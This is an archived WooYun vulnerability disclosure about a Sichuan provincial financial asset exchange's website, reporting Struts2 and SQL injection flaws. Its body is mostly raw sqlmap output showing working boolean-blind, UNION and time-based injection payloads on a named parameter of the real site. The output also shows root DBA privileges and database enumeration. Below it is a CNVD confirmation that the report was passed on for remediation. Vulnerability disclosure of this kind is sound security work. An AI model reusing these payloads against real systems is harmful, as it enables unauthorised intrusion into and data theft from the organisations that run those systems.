乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-07-13: 细节已通知厂商并且等待厂商处理中 2014-07-18: 厂商已经确认,细节仅向厂商公开 2014-07-28: 细节向核心白帽子及相关领域专家公开 2014-08-07: 细节向普通白帽子公开 2014-08-17: 细节向实习白帽子公开 2014-08-27: 细节向公众公开
某省金融资产交易所的两枚漏洞,struts2和sql注射
四川省金融资产交易所url:http://www.scfae.com/
---Place: GETParameter: class_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: class_id=80' AND 6332=6332 AND 'UMJp'='UMJp Type: UNION query Title: MySQL UNION query (NULL) - 11 columns Payload: class_id=80' LIMIT 0,1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x3a6b676a3a,0x474f5a426b46456a6745,0x3a716b733a),NULL,NULL,NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: class_id=80' AND SLEEP(5) AND 'fHfq'='fHfq---[11:57:58] [INFO] testing MySQL[11:57:58] [INFO] confirming MySQL[11:57:58] [WARNING] reflective value(s) found and filtering out[11:57:58] [INFO] the back-end DBMS is MySQL[11:57:58] [INFO] fetching banner[11:57:58] [INFO] actively fingerprinting MySQL[11:57:58] [INFO] executing MySQL comment injection fingerprint[11:57:59] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' and/or switch '--hex'[11:57:59] [WARNING] unable to perform MySQL comment injectionweb application technology: JSPback-end DBMS: active fingerprint: MySQL >= 5.5.0banner: '5.5.17'[11:57:59] [INFO] fetching current usercurrent user: 'root@localhost'[11:57:59] [INFO] fetching current databasecurrent database: 'scfae'[11:57:59] [INFO] testing if current user is DBA[11:57:59] [INFO] fetching current usercurrent user is DBA: True[11:58:00] [INFO] fetching database usersdatabase management system users [19]:[*] 'root'@'localhost'[11:58:00] [INFO] fetching database users privilegesdatabase management system users privileges:[*] 'root'@'localhost' (administrator) [19]: privilege: ALTER privilege: CREATE privilege: CREATE TEMPORARY TABLES privilege: DELETE privilege: DROP privilege: EXECUTE privilege: FILE privilege: INDEX privilege: INSERT privilege: LOCK TABLES privilege: PROCESS privilege: REFERENCES privilege: RELOAD privilege: REPLICATION SLAVE privilege: SELECT privilege: SHOW DATABASES privilege: SHUTDOWN privilege: SUPER privilege: UPDATE[11:58:00] [WARNING] on MySQL the concept of roles does not exist. sqlmap will enumerate privileges instead[11:58:00] [INFO] fetching database users privilegesdatabase management system users roles:[*] 'root'@'localhost' (administrator) [38]: role: ALTER role: ALTER role: CREATE role: CREATE role: CREATE TEMPORARY TABLES role: CREATE TEMPORARY TABLES role: DELETE role: DELETE role: DROP role: DROP role: EXECUTE role: EXECUTE role: FILE role: FILE role: INDEX role: INDEX role: INSERT role: INSERT role: LOCK TABLES role: LOCK TABLES role: PROCESS role: PROCESS role: REFERENCES role: REFERENCES role: RELOAD role: RELOAD role: REPLICATION SLAVE role: REPLICATION SLAVE role: SELECT role: SELECT role: SHOW DATABASES role: SHOW DATABASES role: SHUTDOWN role: SHUTDOWN role: SUPER role: SUPER role: UPDATE role: UPDATE[11:58:01] [INFO] fetching database namesavailable databases [5]:[*] information_schema[*] mysql[*] performance_schema[*] scfae[*] test[11:58:01] [INFO] fetching tables for databases: 'information_schema, mysql, performance_schema, scfae, test'Database: information_schema[19 tables]+---------------------------------------+| CHARACTER_SETS || COLLATIONS || COLLATION_CHARACTER_SET_APPLICABILITY || COLUMNS || COLUMN_PRIVILEGES || ENGINES || EVENTS || FILES || GLOBAL_STATUS || GLOBAL_VARIABLES || KEY_COLUMN_USAGE || PARAMETERS || PARTITIONS || PLUGINS || PROCESSLIST || PROFILING || REFERENTIAL_CONSTRAINTS || ROUTINES || SCHEMATA |+---------------------------------------+[11:58:01] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) columns[11:58:01] [INFO] fetching current database[11:58:01] [INFO] fetching columns for table 'CHARACTER_SETS' in database 'scfae'[11:58:02] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind[11:58:02] [INFO] retrieved:[11:58:02] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries[11:58:03] [INFO] retrieved:[11:58:05] [INFO] fetching columns for table 'COLLATIONS' in database 'scfae'[11:58:05] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind[11:58:05] [INFO] retrieved:[11:58:06] [INFO] retrieved:[11:58:08] [INFO] fetching columns for table 'COLLATION_CHARACTER_SET_APPLICABILITY' in database 'scfae'[11:58:08] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind[11:58:08] [INFO] retrieved:[11:58:10] [INFO] retrieved:[11:58:11] [INFO] fetching columns for table 'COLUMNS' in database 'scfae'[11:58:12] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind[11:58:12] [INFO] retrieved:[11:58:13] [INFO] retrieved:[11:58:15] [INFO] fetching columns for table 'COLUMN_PRIVILEGES' in database 'scfae'[11:58:15] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind[11:58:15] [INFO] retrieved:[11:58:17] [INFO] retrieved:[11:58:18] [INFO] fetching columns for table 'ENGINES' in database 'scfae'[11:58:18] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blinddo you want sqlmap to try to optimize value(s) for DBMS delay responses (option'--time-sec')? [Y/n] yA[12:11:00] [INFO] retrieved:[12:11:01] [INFO] fetching columns for table 'EVENTS' in database 'scfae'[12:11:01] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind[12:11:01] [INFO] retrieved:[12:11:03] [INFO] retrieved:[12:11:04] [INFO] fetching columns for table 'FILES' in database 'scfae'[12:11:05] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind[12:11:05] [INFO] retrieved:[12:11:06] [INFO] retrieved:[12:11:08] [INFO] fetching columns for table 'GLOBAL_STATUS' in database 'scfae'[12:11:08] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind[12:11:08] [INFO] retrieved:[12:11:10] [INFO] retrieved:[12:11:11] [INFO] fetching columns for table 'GLOBAL_VARIABLES' in database 'scfae'[12:11:12] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind[12:11:12] [INFO] retrieved:[12:11:13] [INFO] retrieved:[12:11:15] [INFO] fetching columns for table 'KEY_COLUMN_USAGE' in database 'scfae'[12:11:15] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind[12:11:15] [INFO] retrieved:[12:11:16] [INFO] retrieved:[12:11:18] [INFO] fetching columns for table 'PARAMETERS' in database 'scfae'[12:11:18] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind[12:11:18] [INFO] retrieved:[12:11:20] [INFO] retrieved:[12:11:21] [INFO] fetching columns for table 'PARTITIONS' in database 'scfae'[12:11:22] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind[12:11:22] [INFO] retrieved:[12:11:23] [INFO] retrieved:[12:11:25] [INFO] fetching columns for table 'PLUGINS' in database 'scfae'[12:11:25] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind[12:11:25] [INFO] retrieved:[12:11:27] [INFO] retrieved:[12:11:28] [INFO] fetching columns for table 'PROCESSLIST' in database 'scfae'[12:11:29] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind[12:11:29] [INFO] retrieved:[12:11:30] [INFO] retrieved:[12:11:32] [INFO] fetching columns for table 'PROFILING' in database 'scfae'[12:11:32] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind[12:11:32] [INFO] retrieved:[12:11:33] [INFO] retrieved:[12:11:35] [INFO] fetching columns for table 'REFERENTIAL_CONSTRAINTS' in database 'scfae'[12:11:36] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind[12:11:36] [INFO] retrieved:[12:11:37] [INFO] retrieved:[12:11:39] [INFO] fetching columns for table 'ROUTINES' in database 'scfae'[12:11:39] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind[12:11:39] [INFO] retrieved:[12:11:41] [INFO] retrieved:[12:11:42] [INFO] fetching columns for table 'SCHEMATA' in database 'scfae'[12:11:42] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind[12:11:42] [INFO] retrieved:[12:11:44] [INFO] retrieved:Database: scfaeTable: ENGINES[2 columns]+--------+------+| Column | Type |+--------+------+| `,` | || A | |+--------+------+[12:11:46] [WARNING] HTTP error codes detected during testing:500 (Internal Server Error) - 1 times[12:11:46] [INFO] fetched data logged to text files under 'c:\Python27\sqlmap\output\www.scfae.com'[*] shutting down at 12:11:46
如上
so?
危害等级:高
漏洞Rank:13
确认时间:2014-07-18 10:14
CNVD确认并复现所述情况,已经转由CNCERT下发给四川分中心,由其后续联系网站管理单位处置。按多个漏洞综合评分,rank 13
暂无